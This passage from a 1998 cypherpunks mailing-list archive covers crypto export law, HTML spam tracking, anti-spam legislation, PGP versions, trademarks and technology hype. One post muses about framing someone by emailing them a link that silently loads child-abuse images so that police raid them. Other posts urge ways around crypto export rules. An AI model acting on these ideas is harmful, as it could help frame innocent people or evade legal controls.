A freeware Java-based, open architected client-side proxy (ByProxy), which includes agents for SPAM filtration, auto pgp encrypt/decrypt among others is posted to www.besiex.com.  It already has noCem and auto/manually builds a friends and enemies list (similar to MailGuard).

--Steve
 ---------------------------------------------------------------------
reply to schear - at - lvdi - dot - net ---

PGP mail preferred, see  	http://www.pgp.com and
http://web.mit.edu/network/pgp.html

RSA fingerprint: FE90 1A95 9DEA 8D61  812E CCA9 A44A FBA9
RSA key: http://keys.pgp.com:11371/pks/lookup?op=index&search=0x55C78B0D
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 19 Feb 1998 12:09:13 +0800
To: Bob De Witt <rdew@el.nec.com>
Subject: Re: Stupid Law
In-Reply-To: <199802180443.UAA12254@yginsburg.el.nec.com>
Message-ID: <Pine.BSF.3.91.980218081656.25512D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain





So leave the laptop in the hotel safe before going back to the US each 
evening.

On Tue, 17 Feb 1998, Bob De Witt wrote:

> Yes, it is.  Even if he wrote a program in Mexico, but carried his laptop
> back and forth daily, each piece can come into the US, but cannot leave
> again!  Uuuuuuuuummmmmmm, gooooood!  Read the actual documents.
> 
> 
> Bob De Witt,
> rdew@el.nec.com
> 
> 
> > From anon@anon.efga.org Tue Feb 17 19:44:29 1998
> > Date: Tue, 17 Feb 1998 22:08:26 -0500
> > From: Anonymous <anon@anon.efga.org>
> > Comments: This message did not originate from the Sender address above.
> > 	It was remailed automatically by anonymizing remailer software.
> > 	Please report problems or inappropriate use to the
> > 	remailer administrator at <admin@anon.efga.org>.
> > To: cypherpunks@toad.com
> > 
> > >Doesn't the act of taking it across the border, in the laptop, constitute
> > >an act of export??
> > 
> > Well, yes it would, but the original scenario includes WRITING the code
> > outside of the US, which means it never was a US creation, even if the
> > creature that happened to be writing the code was native to the US.
> > 
> > The question is whether the dude could pull a stunt like this and get
> > away with it. I'd say go for it. You got a plausible loophole to a
> > stupid law that might not hold in court anyways.
> > 
> > -Anon
> > 
> > 
> > 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael H. Warfield" <mhw@wittsend.com>
Date: Thu, 19 Feb 1998 00:01:25 +0800
To: whgiii@invweb.net
Subject: Re: I was auto-outed by an IMG tag in HTML spam
In-Reply-To: <199802180937.EAA10267@users.invweb.net>
Message-ID: <199802181346.IAA21174@alcove.wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain



William H. Geiger III enscribed thusly:
> In <37a52bf54844994eb90c8e8af06b07b7@anon.efga.org>, on 02/18/98 
>    at 03:00 AM, Anonymous <anon@anon.efga.org> said:

> >Use mail readers that don't automatically process HTML and
> >connect to image servers, accept cookies, or run javascripts.  You are
> >being watched by tricky defective, er, detective types. es.

> Several things here:

	:
	: - Point 1 deleted...
	:

> 2. AutoProcessing of Attachments:

> This is *allways* a BadThing(TM). Not only is it an obvious security risk
> it is a PITA for the user. I would be rally pissed if my mailer launched a
> V-Card app everytime someone thought it was a GoodThing(TM) to add these
> attachments to every message they sent out.

	Oh it gets better than that!  I know of one person who got hit with
a specially formated porno-spam message.  When he opened it, the html message
did an autorestart on his browser and <you guessed it> there he was browsing
the porno site!  What a convenient feature!  Especially with you boss and
co-workers in the vicinity!

	Needless to say, that person has is now a rabid anti-html in E-Mail
fanatic!

	:
	: - Remainder of message deleted...
	:

> ---------------------------------------------------------------
> William H. Geiger III  http://users.invweb.net/~whgiii
> Geiger Consulting    Cooking With Warp 4.0
> 
> Author of E-Secure - PGP Front End for MR/2 Ice
> PGP & MR/2 the only way for secure e-mail.
> OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 19 Feb 1998 02:05:35 +0800
To: Anonymous <cypherpunks@toad.com
Subject: Re:
In-Reply-To: <2d903692314a67a27cf3a173ba82fd9f@anon.efga.org>
Message-ID: <3.0.5.32.19980218091525.007f8100@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 11:36 PM 2/17/98 -0500, Anonymous wrote:
>
>Here is description of my stream cipher, it operates one
>...
>...
>VB source code:
>^^^^^^^^^^^^^^^
>
>------------------------------------------------------
>Who the hell uses VB of all languages - to write
>a crypto algorithm? And, which sane person uses
>MicroSucks Winduhz? 
>
>


Forget the implementation language/platform bigotry.

The substantive issue is, Tell us what it is designed
to do *precisely*, and then tell us how it does it.
If it is claimed to be a "stream cipher" then it should do 
certain things, e.g., produce incompressible data
from an input stream consisting of identical symbols.
Argue with logic, don't make us read your code.



------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

	Has Nike hired Monica to endorse kneepads yet?





	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 19 Feb 1998 01:46:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Private schools as free speech havens?
In-Reply-To: <01ITPE1OG8I49G4R0J@ctrvax.Vanderbilt.Edu>
Message-ID: <v0310280db110cd913653@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:56 PM -0800 2/17/98, Bennett Haselton wrote:

>But you wouldn't ask them to accept discriminatory treatment that had
>nothing to do with their disability, simply on the basis that the condition
>causing them to be discriminated against would eventually go away.

What is this "ask them to accept discriminatory treatment" nonsense?

An employer should be free to hire and fire whom he chooses, based on the
criteria he chooses.


--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 19 Feb 1998 00:18:24 +0800
To: "Michael H. Warfield" <mhw@wittsend.com>
Subject: Re: I was auto-outed by an IMG tag in HTML spam
In-Reply-To: <199802181346.IAA21174@alcove.wittsend.com>
Message-ID: <199802181636.LAA13398@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199802181346.IAA21174@alcove.wittsend.com>, on 02/18/98 
   at 08:46 AM, "Michael H. Warfield" <mhw@wittsend.com> said:

>	Oh it gets better than that!  I know of one person who got hit with a
>specially formated porno-spam message.  When he opened it, the html
>message did an autorestart on his browser and <you guessed it> there he
>was browsing the porno site!  What a convenient feature!  Especially with
>you boss and co-workers in the vicinity!

This could be a good sting opperation. Send an anonymous e-mail message
that points to a childporn site. The [add your jackbooted thug
orginization here] kick in your door as soon as they get the signal that
your machine has connected to the site and downloaded the images.

Hmmmm I wonder if there is a way to get the browser to DL an image without
displaying it. The pictures would be sitting in your cache without even
knowing it. Probably not a big issue I would imagine that a jury would
convict on website logs alone even if no pictures were found on the
machine.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Dos: Venerable.  Windows: Vulnerable.  OS/2: Viable.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNOr5IY9Co1n+aLhhAQH8TgQAsZUM0aA1XLwWigarq5PCz55uc67Zvgui
5SrwS2JasrhaEoZ//inxT8kQi7qJGSdd5sA/VckOHOWNmqOz4QaJJyHIpldd14we
lVtFc3t1DRxpY/RdUXEu45AvbWvVzDijAVU3nOgcaPRzllT1NYnSEuxnjKgsJdLd
IzGIn8BKpuo=
=SQJ/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 19 Feb 1998 00:53:45 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Websites and trademarks at odds [CNN]
In-Reply-To: <199802181552.JAA11020@einstein.ssz.com>
Message-ID: <199802181715.MAA13754@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <199802181552.JAA11020@einstein.ssz.com>, on 02/18/98 
   at 09:52 AM, Jim Choate <ravage@ssz.com> said:

>>      How can consumers trust using the Web, where guessing about a
>>      company's address can be like playing shopper's roulette? Imagine
>>      visiting your local grocery store and finding no milk or eggs but
>>      auto parts instead. Imagine walking into Burger King and being
>>      offered computer software.

This is really much todo about nothing and shows a complete lack of
understanding of Trademark laws.

Trademarks are product specific, there is nothing preventing preventing
two companies from having the same name provided they are not in the same
business. You can even have two companies with the same name in the same
business provided that the likelyhood of mistaking one company for another
is small.

Some examples:

It is perfectly legal to have a company name IBM (the computer company)
and another company called IBM (a local auto repair shop in Podunk, AK).

It is also legal to have two companies called Widgets both making widgets
provided that both were operating in different regions (Widgets #1 only
operated in NewEngland while Widgets #2 only operated in Texas).

Trademarks not only involve company names but also include product names.
A good example of this is Intel and the naming of thier CPU's. The courts
ruled that they could not trademark a Number (286,386,486,...) an this is
the reason for the Pentium(TM) name for their chips which is
trademarkable. Even so there is nothing preventing McDonalds from calling
thier new burger the Pentium as no one should mistake a burger for a CPU
(well except for some windows users <g>).

Now understanding that even when one Tradmarks a name it does not give you
exclusive use of the name how does one apply trademarks to a domain name?

Should www.windows.com be the exclusive domain of Microsoft just because
they have a program with that name? What about a window manufacture
shouldn't he have an equal if not greater claim to that domain (after all
his whole business is windows)? Which windows manufacture? Should ABC
Windows have that claim or Billy-Bob's Windows Imporium? Should the
trademark claim extend to all possible domains? (www.windows.com,
www.windows.org, www.windows.net,
www.windows-blows-chunks-and-bill-gates-sucks-eggs.com)?

I haven't even touched on the international issues. Should a company from
one company have the ability to enforce it's trademark claim to all
domains world-wide?

I fear that this is just another example of the Government trying to get
it's sticky fat fingers on another portion of the net not to mention yet
aother shoddy piece of journalism (calling it that give too much credit to
the author).

Just for the slow ones out there it is perfectly legal for me to open a
computer store, call it Buger King and call my computer system the Wopper.


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: I'm an OS/2 developer...I don't NEED a life!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNOsCLI9Co1n+aLhhAQGPUAP/XIg+CYn3zGQH6ztVDY+gZAEVjPMU04QF
4JePKqGUOPSaXwHF6U7Fvx9bqGl9cBd36JT0KwwQluBRQBdJ4q2FAX4a92JubtuX
PqeJRTXNf9QszMDh5LFVSBu+aQi5qozqAglHf6Ep7hMNQ8ZyK1yw7pYHWRvLALGJ
dQQaIWI/zKo=
=RrnK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 19 Feb 1998 02:27:21 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Is spam really a problem?
In-Reply-To: <199802181733.SAA26244@basement.replay.com>
Message-ID: <v0310280eb110d37999a3@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:33 AM -0800 2/18/98, Anonymous wrote:
>I see discussion of spam here and everywhere on
>the net. But who finds it a *real* problem, and
>why?

Indeed, discussion of "what to do about spam?" periodically consumes all of
the main lists I'm on. Discussion of spam is worse than the actual spam.

>Nevertheless, spam does not create a big problem
>for me. Perhaps 10-15% of my home email is spam,
>(much less at work) and I identify and kill it
>in less time than it takes me to sort out the
>junk from my snail mail.

Same for me. I can delete commercial advertisements ("spam") in seconds.


>Don't get me wrong; I don't *like* spam. But
>for me it's a minor problem, certainly not
>worthy of legal remedies. I'm willing to suffer
>a certain level of foolish annoyance gladly
>in return for liberty.

Well said. "Be careful what you ask for."

Anti-spam bills are already wending their way through Congressional
committees. If passed, an FCC-like authority over the Net will have been
granted.

(Though probably ineffectual, given the use of offshore sites, throwaway
accounts, etc. The real effect will probably be to usher in an era of
mandatory identification for account opening, which is pernicious, and
various other tracking and surveillance systems.)


The only  "spam" which really bothers me is/are _mail bombs_, where
hundreds or even thousands of messages fill my mailbox. I've been hit twice
with these attacks. And a friend of mine received 25,000 messages from one
sender...he sued and won a substantial settlement from the employer of the
guy who mail bombed him.

But such attacks will likely not be affected by anti-spam laws anyway.
Perps can use sites in other countries, beyond the reach of the laws. And
remailers. And so on.

"Be careful what you ask for."

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 19 Feb 1998 00:23:19 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: New technology around the corner [slashdot.org]
Message-ID: <199802181626.KAA11323@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Note: Text edited for relevance.

Forwarded message:

> Subject: http:--www.slashdot.org-

>    Hitachi Makes Breakthrough Contributed by Justin
>    [Technology] Tue Feb 17 16:40:30 1998 EST
>    From the rapidly-advancing-society? dept.
>    Hitachi has made a breakthrough of their own, in a different kind of
>    storage. Hitachi announced they have found a way to reduce the number
>    of electrons needed to store a bit of information in a DRAM chip. The
>    128MB chips should be coming out soon, and will be perfected in the
>    16GB (*drool*) generation of chips.
>    Read More...
>    13 comment(s)

>    Seagate Makes Breakthrough Contributed by Justin
>    [Technology] Tue Feb 17 15:28:31 1998 EST
>    From the buncha-really-tiny-mirrors dept.
>    A division of Seagate Technology, Inc. has announced a new way of
>    increasing disk drive capacity density. Quinta has disclosed key parts
>    of their technology, which they call Optically Assisted Winchester
>    (OAW) technology to make a practical magento-optical disk that is
>    capable of holding 40GB/square inch. The new technology uses mirrors,
>    a new servo system, and other methods to allow these large capacities.

>    Slashdot is participating in Distributed.Net's Decryption Projects.
>    Read who's helping, and why. Check out Our Current Rank.

>    [Technology] Sun Feb 15 11:12:15 1998 EST
>    Plastic Screens (12)


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 19 Feb 1998 00:28:18 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Quebec secession trial - status?
Message-ID: <199802181633.KAA11473@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I was wondering if anyone in the great white north might enlighten us on
what is going on with the Quebec secession case that starts this week...


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 19 Feb 1998 03:21:46 +0800
To: jim.burnes@ssds.com
Subject: Re: New technology around the corner [slashdot.org]
In-Reply-To: <199802181626.KAA11323@einstein.ssz.com>
Message-ID: <v0310280fb110e05fa16b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:32 AM -0800 2/18/98, Jim Burnes wrote:

>Does anyone else get the feeling that we are on the cusp of
>serious exponential change in technology?   I know its been
>going exponential for a while, but now I'm really starting
>to feel it.  Thats major breakthroughs in two weeks:
>
>1. 170 TB Polymer memory sandwiches (OptiCom)
>2. Flat Plastic Video Screens using Light Emitting Polymers "LEPs"
>(Cambridge)
>3. massive DRAMS (Hitachi)

No, I don't think we're on any kind of cusp of a growth curve. If anything,
several things are slowing down.

Beware the "press release." The items above are just a few of literally
thousands of such announcements.

Remember how "laser pantography" was going to revolutionize chip-making,
and even make "back yard fabs" possible? How about "silicon on sapphire"
and how it would obsolete Integrated Injection Logic? (You don't remember
I-squared L? Shame on you, as it was scheduled to put Intel out of business
by 1976).

Or how about plastic cubes that can store terabytes. Or wafer scale
integration. Or e-beam addressed memory. Or neural networks. Or fuzzy logic.

("Hey, Tim's being a negativist. My new rice cooker says it has fuzzy logic
in it.")

And then there's the whole universe of speculation about quantum computers,
DNA computers, nanotechnology, etc.

The fact is that R&D labs partly run on hype. And journalists are willing
to interview researchers to generate stories.

A particularly interesting place to read about all the Latest and Greatest
technologies destined to replace silicon is "Electronic Engineering Times."
EE Times has for at least 15 years been running breathless hype about such
technologies as neural networks, brain machines, organic semiconductors,
optical memories, and on and on.

(These articles are often interesting, too. I just don't get too excited by
some researcher's predictions.)

>ObCrypto: Since polymer transistors seem to be necessary to implement
>polymer memory, how does this effect computation speed?  The polymer
>transistors must be around 30-40nm and low power.  How long until we
>have Polymer PGA,PALS,CPUs?  How fast will they be?  Is it time to add
>a few more bits to the public key?  Are there any cipher attacks that
>would benefit from obscenely large amounts of fast memory?  Sorry if
>this is a naive question to the theorists.

If you literally mean "add a few more bits," as in 4 or 5 or so bits, that
pretty much applies every few years, by the usual Moore's Law sorts of
calculations. (Except of course it makes no logistic/administrative sense
to literally add a few more bits...better of course to pick a "safely
large" size. And of course the strength is usually more dependent on the
underlying symmetric cipher key size (e.g., IDEA).

As for "polymer memory," or even Hitachi's "fewer electrons in the cell"
research, believe it when you see it. And when you can buy it. And buy it
cheaply.

But I don't get overly excited by announcements of new developments like
this. Perhaps following the industry for 25 years has made me jaded.

--Tim May


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jim.burnes@ssds.com>
Date: Thu, 19 Feb 1998 02:41:50 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: New technology around the corner [slashdot.org]
In-Reply-To: <199802181626.KAA11323@einstein.ssz.com>
Message-ID: <34EB2935.AC6847AE@ssds.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> 
> Note: Text edited for relevance.
> 
> Forwarded message:
> 
> > Subject: http:--www.slashdot.org-
> 
> >    Hitachi Makes Breakthrough Contributed by Justin
> >    [Technology] Tue Feb 17 16:40:30 1998 EST
> >    From the rapidly-advancing-society? dept.
> >    Hitachi has made a breakthrough of their own, in a different kind of
> >    storage. Hitachi announced they have found a way to reduce the number
> >    of electrons needed to store a bit of information in a DRAM chip. The
> >    128MB chips should be coming out soon, and will be perfected in the
> >    16GB (*drool*) generation of chips.

Does anyone else get the feeling that we are on the cusp of
serious exponential change in technology?   I know its been
going exponential for a while, but now I'm really starting
to feel it.  Thats major breakthroughs in two weeks:

1. 170 TB Polymer memory sandwiches (OptiCom)
2. Flat Plastic Video Screens using Light Emitting Polymers "LEPs"
(Cambridge)
3. massive DRAMS (Hitachi)

ObCrypto: Since polymer transistors seem to be necessary to implement
polymer memory, how does this effect computation speed?  The polymer
transistors must be around 30-40nm and low power.  How long until we
have Polymer PGA,PALS,CPUs?  How fast will they be?  Is it time to add
a few more bits to the public key?  Are there any cipher attacks that
would benefit from obscenely large amounts of fast memory?  Sorry if
this is a naive question to the theorists.

Jim





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 19 Feb 1998 01:35:54 +0800
To: Bob De Witt <rdew@el.nec.com>
Subject: Re: Letter of the law
In-Reply-To: <199802180228.SAA12074@yginsburg.el.nec.com>
Message-ID: <Pine.SOL.3.96.980218121437.17887A-100000@c00954-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 17 Feb 1998, Bob De Witt wrote:

>Ken,
>
>I guess I was thinking about the NSA, recording the message and deciding to 
>make an example.  They seem to do that occassionally just to keep the rest
>of us folks 'in line'.  I can't see the INS even understanding what they 
>were looking at, even if you showed them.  "My, my, my!  All those bits are
>really in that little box?"  You have to understand the difference between
>a 'large possibility' and a 'fat chance', yes?

yep.

>Now, drugs!  That they understand ...  But a PKI key?  Or, a file??  Or, a
>crypto program (especially renamed)???  What piece of this trick question 
>am I missing?

actually, you are right on target with your comments.  IMO, you didn't
miss anything.  i was simply referring to my dislike of random body cavity
searches and harassment by US Customs and customs officials in other
countries (i travel alot and have been subjected to alot of bullshit).  so
far, Japan was the worst of all the countries i have visited (18 at last
count in Europe and Asia alone).  they saw my waist-length hair, tattoos
and US passport....well, you can guess the rest.

TATTOOMAN

>Bob De Witt,
> rdew@el.nec.com
>The views expressed herein are my own,
>and are not attributable to any other
>source, be it employer, friend or foe.
>
>
>> From jkwilli2@unity.ncsu.edu Tue Feb 17 10:56:22 1998
>> X-Authentication-Warning: c00954-100lez.eos.ncsu.edu: jkwilli2 owned process doing -bs
>> Date: Tue, 17 Feb 1998 13:56:29 -0500 (EST)
>> From: Ken Williams <jkwilli2@unity.ncsu.edu>
>> X-Sender: jkwilli2@c00954-100lez.eos.ncsu.edu
>> To: Bob De Witt <rdew@el.nec.com>
>> cc: cypherpunks@toad.com
>> Subject: Re: Letter of the law
>> X-Copyright: The contents of this message may not be reproduced in any form
>> X-Copyright: (including Commercial use) unless specific permission is granted
>> X-Copyright: by the author of the message.  All requests must be in writing.
>> X-Disclaimer: The contents of this email are for educational purposes only
>> X-Disclaimer: and do not reflect the thoughts or opinions of either myself
>> X-Disclaimer: or my employer and are not endorsed by sponsored by or provided
>> X-Disclaimer: on behalf of North Carolina State University.
>> MIME-Version: 1.0
>> 
>> On Tue, 17 Feb 1998, Bob De Witt wrote:
>> 
>> >Doesn't the act of taking it across the border, in the laptop, constitute
>> >an act of export??
>> 
>> well, yes, of course.  that was taken for granted in my comments.
>> likewise, if you go to a tattoo parlor and get the infamous 4 line
>> crypto-sig tattooed on your ass, then you are classified as a munition,
>> and you cannot leave the US.
>> 
>> the only relevant question here regards the odds that a US Customs officer
>> is going to want you to drop your drawers and bend over...
>> ;-)
>> 
>> ken 
>> 
>> >> >>I'm in El Paso Texas... so close to the border
>> >> >>I can see Old Mex outside my window as I write this..
>> >> >>I'm over there nearly every day for lunch ( I actually
>> >> >>walk there from my house it's so close) If I write
>> >> >>a crypto program on my laptop over there and ftp
>> >> >>it to a web page I have on a server outside the US
>> >> >>will I have avoided the foolish export regs??
>> >> >>Does anyone know of someone trying this before?? 
>> >> >
>> >> >My guess is this:
>> >> >  if it has the name of a US citizen in the copyright
>> >> >notice, it will be assumed to have been made in the
>> >> >US. if the morons even go after you. you still may have
>> >> >a plausable excuse if ever taken to court.
>> >> >after all, you "exported" youself, which is a perfectly
>> >> >legal thing to take out of the country, and "yourself"
>> >> >accidentally spewed a copy of something that couldn't
>> >> >cross the border.
>> >> >I don't think anybody has tried this and been challenged.
>> >> >then again, a lot of us don't have the opportunity.
>> >> >It's easier to ask forgivness than permission...
>> >> >Another easier excuse would be to publish it freely in
>> >> >hardcopy form, and just "happen" to have somebody end up
>> >> >"typing" in your source code abroad, making a legit
>> >> >international copy...
>> >> >-Anon2
>> >> 
>> >> i would think that the big question here, legally, is whether or not you
>> >> would be ustilizing a US ISP and/or cellular provider to make the upload
>> >> of the crypto program to the foreign server via ftp.  as long as all the
>> >> packets stay outside of US borders, in other words, as long as you don't
>> >> use a US ISP and cellular provider, then i don't see how you would be
>> >> violating any laws in this case.
>> >> 
>> >> Regards,
>> >> 
>> >> TATTOOMAN 
>> >> 
>> >> http://152.7.11.38/~tattooman/
>> >> 
>> >Bob De Witt,
>> >rdew@el.nec.com
>> >The views expressed herein are my own,
>> >and are not attributable to any other
>> >source, be it employer, friend or foe.
>> > 
>> >
>> 
>> TATTOOMAN
>> 
>> /--------------------------[   TATTOOMAN   ]--------------------------\
>> | ORG: NC State Computer Science Dept    VP of The  E. H. A. P. Corp. |
>> | EML: jkwilli2@adm.csc.ncsu.edu         ehap@hackers.com             |
>> | EML: jkwilli2@unity.ncsu.edu           ehap-secure@hackers.com      |
>> | WWW: http://www4.ncsu.edu/~jkwilli2/   http://www.hackers.com/ehap/ |
>> | FTP: ftp://152.7.11.38/pub/personal/tattooman/                      |
>> | W3B: http://152.7.11.38/~tattooman/w3board/                         |
>> | PGP: finger tattooman@152.7.11.38                                   |
>> \----------------[   http://152.7.11.38/~tattooman/  ]----------------/
>> 
>> 
>> 
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Thu, 19 Feb 1998 01:55:09 +0800
To: Breezy <ebresie@ccwf.cc.utexas.edu>
Subject: Re: bugged?
In-Reply-To: <34EA2E43.240F2420@ccwf.cc.utexas.edu>
Message-ID: <Pine.SOL.3.96.980218122312.17887B-100000@c00954-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 17 Feb 1998, Breezy wrote:

>Babu Mengelepouti wrote:
>> 
>> Ken Williams wrote:
>> >
>> > I got pgp 5.0. which will not work with your version. Upgrade man :-)
>> 
>> He's the one who needs to change his version... to 2.6.x
>
>Why use 2.6.x vs 5.0?  Is 5.0 not as stable or something?  Not as good?
>What's up?
>
>====/------ Breezy ----------------------------/ 
>===/---- ebresie@ccwf.cc.utexas.edu ----------/ 
>==/---- http://ccwf.cc.utexas.edu/~ebresie --/
>

PGP v2.6.2 for UNIX is RSA, and cannot decrypt anything crypted with 
PGP v5.x.  v5.0 for UNIX features the DSS/Diffie-Hellman algorithm that
all the other 5.x versions have.  v5.0 is stable, better, and is basically
the current standard.  it is more script-friendly and has a better
command-line.

basically, it really sucks when every encrypted message i have gotten in
the past week was encrypted with RSA/DSS and i couldn't decrypt it with
the v2.6.2 that is installed at work.  due to space limitations on my
volume server and our nihilistic copyrighted software policy, my only
solution/option at the moment is to bring my laptop to work just for
message decryption.

i've sent in a software request for a PGP upgrade on the network, but due
to the expensive PGP licensing agreements and the fact that we have close
to 50,000 active users, i don't expect anything to be done.

guess state employees don't have the right to privacy any more huh?
and neither do the studnets here for that matter...


TATTOOMAN

work disclaimer:  i lied and i'm legally insane.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 19 Feb 1998 06:14:33 +0800
To: cypherpunks@toad.com
Subject: Re: Is spam really a problem?
In-Reply-To: <199802181733.SAA26244@basement.replay.com>
Message-ID: <19980218135327.39037@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Feb 18, 1998 at 06:33:07PM +0100, Anonymous wrote:
> 
> I see discussion of spam here and everywhere on
> the net. But who finds it a *real* problem, and
> why?

The way I see it, the problem with spam isn't that it takes too much
effort to delete them, but that it discourages useful advertisement
through email. Email could be a very efficient way for companies to send
valuable information to potential customers, but the incentives are such
that virtually all unsolicited commercial email are of very low value
and are deleted without being read. 

If you like game theory, you might want to search the cypherpunks mailing
list archive for a game theoretic analysis of the spam situation.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 19 Feb 1998 07:27:05 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Is spam really a problem?
In-Reply-To: <199802181733.SAA26244@basement.replay.com>
Message-ID: <v03102813b1111cb7ced1@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:47 PM -0800 2/18/98, sunder wrote:
>Anonymous wrote:
>>
>> I see discussion of spam here and everywhere on
>> the net. But who finds it a *real* problem, and
>> why?
>
>It eats up your valuable time.  You might not see it for what it is, but
>it is an interruption of normal service.  It's annoying as having your
>pager go off durring sex and having to call back your boss instead of
